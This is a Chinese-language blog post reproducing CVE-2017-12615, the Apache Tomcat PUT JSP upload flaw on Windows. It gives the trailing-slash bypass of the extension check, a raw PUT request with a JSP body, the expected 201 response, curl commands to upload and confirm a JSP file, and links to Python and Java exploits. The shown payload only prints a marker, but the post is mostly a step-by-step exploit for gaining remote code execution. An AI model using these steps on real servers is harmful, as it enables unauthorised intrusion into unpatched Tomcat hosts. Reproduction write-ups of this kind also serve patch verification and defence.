漏洞复现|CVE-2017-12615远程代码执行(内附POC)

作者: wanmidi 分类: Tomcat,web类 发布时间: 2019-08-29 13:30

CVE-2017-12615

在Windows上运行的Apache Tomcat 7.0.0到7.0.79的POC漏洞利用; CVE-2017-12615 PUT JSP漏洞。

描述:

根据设计,不允许您通过Apache Tomcat服务器上的PUT方法上载JSP文件。这可能是一种安全措施,可以防止攻击者上传JSP shell并在服务器上获得远程代码执行。但是,由于检查不足,攻击者可以在7.0上获得远程代码执行。Tomcat服务器通过使用特制的HTTP请求在Tomcat服务器上请求PUT方法来启用PUT。

漏洞利用方法:

通过在文件名的扩展名后面附加’/’字符,可以绕过文件扩展名检查。

在请求方法中利用:

请求

PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>


如果成功,预期的响应

HTTP / 1.1  201 Created
 Server: Apache-Coyote / 1.1 
Content-Length: 0 
Date: Sat,23 Sep 2017 06:36:36 GMT 
Connection: close

使用’curl’进行漏洞利用:

1.创建一个.jsp文件(例如test.jsp):

<%out 。write(“ <html> <body> <h3> [+] JSP文件通过curl成功上传,JSP out.write执行。</ h3> </ body> </ html> ”); % >

2.在目标服务器上执行curl命令:

curl -X PUT http:// target-host-or-ip-address:port / test.jsp / -d @  - < test.jsp

3.通过浏览目标地址或检查您的文件是否上传:

curl http:// target-host-or-ip-address:port / test.jsp

PYthon版本: https://mi-di.cn/ CVE-2017-12615/ CVE-2017-12615.py

java版本: https://mi-di.cn/ CVE-2017-12615/ CVE-2017-12615-Exploit.jar

批量pOC 后续等待

发表评论

电子邮件地址不会被公开。 必填项已用*标注